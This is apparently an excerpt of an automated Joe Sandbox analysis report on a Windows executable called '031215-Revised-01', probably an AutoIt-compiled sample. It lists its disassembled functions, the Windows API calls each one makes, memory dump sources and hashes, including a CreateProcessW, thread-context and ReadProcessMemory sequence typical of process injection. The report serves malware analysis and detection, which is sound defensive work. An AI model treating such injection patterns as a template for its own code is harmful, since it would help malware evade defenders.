                                        • Instruction ID: 99542ca92de7a37e874c88b3d07329973aa265728b70f0a1d7465787ae70b0e7
                                        • Opcode Fuzzy Hash: e627dde3aee2eb773776b8ebc46295cd0e2840d1a0a4df43844726ae18abcef2
                                        • Instruction Fuzzy Hash: A7B13D71D00119AFDF21EBA5CC86EDEB7BDEF49350F1040A6F609B6142EB749A448FA1
                                        Function 00073B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 952 73b1c-73b27 953 73b99-73b9b 952->953 954 73b29-73b2e 952->954 956 73b8c-73b8f 953->956 954->953 955 73b30-73b48 RegOpenKeyExW 954->955 955->953 957 73b4a-73b69 RegQueryValueExW 955->957 958 73b80-73b8b RegCloseKey 957->958 959 73b6b-73b76 957->959 958->956 960 73b90-73b97 959->960 961 73b78-73b7a 959->961 962 73b7e 960->962 961->962 962->958
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00073B0F,SwapMouseButtons,00000004,?), ref: 00073B83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: ff3b869a866a02d104f0710fda47ace6d76ecefd77b3758cff3e41f7bea0ad4d
                                        • Instruction ID: dd9212f60093ef168a2ca351b32afed732e58feac700281a49f765cb44049317
                                        • Opcode Fuzzy Hash: ff3b869a866a02d104f0710fda47ace6d76ecefd77b3758cff3e41f7bea0ad4d
                                        • Instruction Fuzzy Hash: 0F112AB5910208FFEB608FA5DC44AEEB7BCEF44744B10855ABA09D7110D375AE40ABA4
                                        Function 013912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01391A5B
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01391AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01391B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                        • Instruction ID: 6171276ad361e44c508e9daf08fb4addd48a57c4acc93df5ad35614d91273bb3
                                        • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                        • Instruction Fuzzy Hash: B3622C30A14259DBEB24DFA4C840BDEB376EF58304F1091A9D20DEB394E7799E81CB59
                                        Function 0007DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 000C32B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: b37854082bed22e5bdefc0fa44ba60077f7f19cc9f0954ec244c942ffecf9095
                                        • Instruction ID: 08f0d097d5d1a5efbb6eb3f49f86ca03ca168833af6e55228b5f18280756a397
                                        • Opcode Fuzzy Hash: b37854082bed22e5bdefc0fa44ba60077f7f19cc9f0954ec244c942ffecf9095
                                        • Instruction Fuzzy Hash: F8C28D71E01245CFCB24DF58C884AADB7F1BF09300F24C5A9E959AB3A2D739AD81CB55
                                        Function 00073923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000B33A2
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00073A04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: 1241ca3ec1a865cf369bb6be509f2231c796530ec01203960fb16edbc3611f88
                                        • Instruction ID: 36401ee33e374725153d3e9e1367160b7d06d48ccfa72f738eba939ee782788d
                                        • Opcode Fuzzy Hash: 1241ca3ec1a865cf369bb6be509f2231c796530ec01203960fb16edbc3611f88
                                        • Instruction Fuzzy Hash: F431C771808304AAD721EB20DC45BDF77D8AB41710F10892EF59D925A2DB749788C7D6
                                        Function 0008FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00090668
                                          • Part of subcall function 000932A4: RaiseException.KERNEL32(?,?,?,0009068A,?,00141444,?,?,?,?,?,?,0009068A,00071129,00138738,00071129), ref: 00093304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00090685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: e8355043839139e28ba15fb9c548b139716cff5895055f4fb0a511537fb537b2
                                        • Instruction ID: fe46c5472628a86c09d63d65a2135137f6645b3923461a83e372b84ec30eb247
                                        • Opcode Fuzzy Hash: e8355043839139e28ba15fb9c548b139716cff5895055f4fb0a511537fb537b2
                                        • Instruction Fuzzy Hash: E8F04F34900309ABCF10B6B4D846CAE77AD6F40350B604535B964D65D2EF71EA66EA81
                                        Function 000E3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000E302F
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000E3044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 095fdccae70b25111f89c046b8b5cb449bf0bc405543ba463de04dd16e762978
                                        • Instruction ID: 0f26e5b8848a534bedb2987ee3023954cf12897580a34bb847ad563acf980ea4
                                        • Opcode Fuzzy Hash: 095fdccae70b25111f89c046b8b5cb449bf0bc405543ba463de04dd16e762978
                                        • Instruction Fuzzy Hash: 94D05E7250032877DA20A7A4AC0EFCB7E7CDB05750F0002A1B695E24D1DEF09984CED0
                                        Function 000F7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000F82F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 000F82FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 000F84DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 0be3f4b5a4c56f5b7d07169621bd0f6970ca4cb849a27913cb87e107ee2d05b9
                                        • Instruction ID: d7bf1ec15d7d387c5d3d2aa51bca4cf6e7c9d516fc49566c77f0ba1d934fa125
                                        • Opcode Fuzzy Hash: 0be3f4b5a4c56f5b7d07169621bd0f6970ca4cb849a27913cb87e107ee2d05b9
                                        • Instruction Fuzzy Hash: C7127B71A083459FC764DF28C484BAABBE1BF89314F04C95DE9898B352CB35E945CF92
                                        Function 000A5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72f86a4d20b91e3261ab881a35b37cc0bb66f6f78840d5265bbe5851453c1c1c
                                        • Instruction ID: 169f5df1d06ec658aab3ca8ddc75c41998d78fba2f371b7109c7ff5b00fde291
                                        • Opcode Fuzzy Hash: 72f86a4d20b91e3261ab881a35b37cc0bb66f6f78840d5265bbe5851453c1c1c
                                        • Instruction Fuzzy Hash: E551AD75E1060AAFCF219FE8CC45FEEBBB8BF06322F140059F505A7292D7359A419B61
                                        Function 000710F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00071BF4
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00071BFC
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00071C07
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00071C12
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00071C1A
                                          • Part of subcall function 00071BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00071C22
                                          • Part of subcall function 00071B4A: RegisterWindowMessageW.USER32(00000004,?,000712C4), ref: 00071BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0007136A
                                        • OleInitialize.OLE32 ref: 00071388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 000B24AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID:
                                        • API String ID: 1986988660-0
                                        • Opcode ID: 122079b625598729e70da11bb66483d49fe490c18c82060f3a43c7d7d92ff077
                                        • Instruction ID: 8db2e4a1cd846870cfb1a3690534d00b503fbafdfc83b0f801c642d16ed5dbac
                                        • Opcode Fuzzy Hash: 122079b625598729e70da11bb66483d49fe490c18c82060f3a43c7d7d92ff077
                                        • Instruction Fuzzy Hash: 7171B9BCE11301AEC384EF79E9456D53AE1BB8B344358822AD55EDBAB2EB7444C1CF44
                                        Function 000DC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00073923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00073A04
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000DC259
                                        • KillTimer.USER32(?,00000001,?,?), ref: 000DC261
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000DC270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer$Kill
                                        • String ID:
                                        • API String ID: 3500052701-0
                                        • Opcode ID: 5eb822c056f097d22e01330ae6725886c005c8bf0c5fc459769f23da50660476
                                        • Instruction ID: e01aa07c33d5bc05b98627d784f8687e7cdc4e3063b2a45fed71717466639547
                                        • Opcode Fuzzy Hash: 5eb822c056f097d22e01330ae6725886c005c8bf0c5fc459769f23da50660476
                                        • Instruction Fuzzy Hash: C6318170904354AFFB729F648895BEBBBECAB06304F04449EE6DA97241C7745A84CB61
                                        Function 000A86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,000A85CC,?,00138CC8,0000000C), ref: 000A8704
                                        • GetLastError.KERNEL32(?,000A85CC,?,00138CC8,0000000C), ref: 000A870E
                                        • __dosmaperr.LIBCMT ref: 000A8739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        • Opcode ID: 5055e2aee700747f232b089c45f2df27f43e7ae45677aef52a5847c2af9a1a93
                                        • Instruction ID: 85253269df09cd9b759a3e2b5cc7ed6080c293e6f035103aee64e280a87f0d8e
                                        • Opcode Fuzzy Hash: 5055e2aee700747f232b089c45f2df27f43e7ae45677aef52a5847c2af9a1a93
                                        • Instruction Fuzzy Hash: 14012B3360562026EAA563F46C45BBE67895BC3775F398219F9149B1D3DEB0CC858390
                                        Function 0007DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 0007DB7B
                                        • DispatchMessageW.USER32(?), ref: 0007DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0007DBB1
                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 000C1CC9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                        • String ID:
                                        • API String ID: 3288985973-0
                                        • Opcode ID: 6c562d1b3ccbd9490971d78321ed8a58ccb5e8b0c8f115f5aa420ae6be879bd6
                                        • Instruction ID: 1f3b3b66a020b1b3160f6bb4e71d7048c6425056b8c829c0bfd064c19e4b30f9
                                        • Opcode Fuzzy Hash: 6c562d1b3ccbd9490971d78321ed8a58ccb5e8b0c8f115f5aa420ae6be879bd6
                                        • Instruction Fuzzy Hash: 6BF03A306443859AE770CB608C89FEA73B8AF45310F504619F65A934D0DB74A4889B55
                                        Function 000E2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,000E2CD4,?,?,?,00000004,00000001), ref: 000E2FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000E2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E3006
                                        • CloseHandle.KERNEL32(00000000,?,000E2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000E300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: e75614f4a1e78dc5f14a919de41dfb93c5e63443f34671371d42e6be299df8fd
                                        • Instruction ID: 4884936c2f1d73c36cbc9d5deab990d31abe7fde9836094a824c7dece919bb55
                                        • Opcode Fuzzy Hash: e75614f4a1e78dc5f14a919de41dfb93c5e63443f34671371d42e6be299df8fd
                                        • Instruction Fuzzy Hash: 99E0863228121477D2302755BC0DF8B3E5CD78AB71F104310F7597A0D046F0154146E8
                                        Function 00081310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 000817F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 99d831d7fa558b3d3f2c99932d1432429509bd4b00b581b55981516bf77032ea
                                        • Instruction ID: 00036127cc544271f457456757f2adc0eba64971749c2c4d740a403f51c60014
                                        • Opcode Fuzzy Hash: 99d831d7fa558b3d3f2c99932d1432429509bd4b00b581b55981516bf77032ea
                                        • Instruction Fuzzy Hash: 03226B70608241DFC724EF14C484BAABBF5BF85314F14896DF49A8B3A2D772E946CB52
                                        Function 000E6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000E6F6B
                                          • Part of subcall function 00074ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        • Opcode ID: 97e9e158ae8930e5ff8994f6c5dd34427b547b6d8852cd02e27e29c497bbe4e9
                                        • Instruction ID: f30e8b491fcb11c573c0d7a49dee08e241682d97b4fd83a49692c0e493c33f6d
                                        • Opcode Fuzzy Hash: 97e9e158ae8930e5ff8994f6c5dd34427b547b6d8852cd02e27e29c497bbe4e9
                                        • Instruction Fuzzy Hash: 23B1B2306082418FCB54EF20C4919AEB7E5AF94300F44886DF49E972A3EF34ED49CB96
                                        Function 00072DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 000B2C8C
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 00072DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00072DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        • Opcode ID: 57c565a7e10255cba23c6c5b44339fb4579f2658cdb1f12dea80bba0fe111977
                                        • Instruction ID: dd3f4595f1edcff148b32ee540af6bf14abe2dbe7647023bbc564d067292fdf0
                                        • Opcode Fuzzy Hash: 57c565a7e10255cba23c6c5b44339fb4579f2658cdb1f12dea80bba0fe111977
                                        • Instruction Fuzzy Hash: 80217271E00258AFDB51EF94C845BEE7BF8AF49314F00C059E449B7242DBB85A89CFA5
                                        Function 000E2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
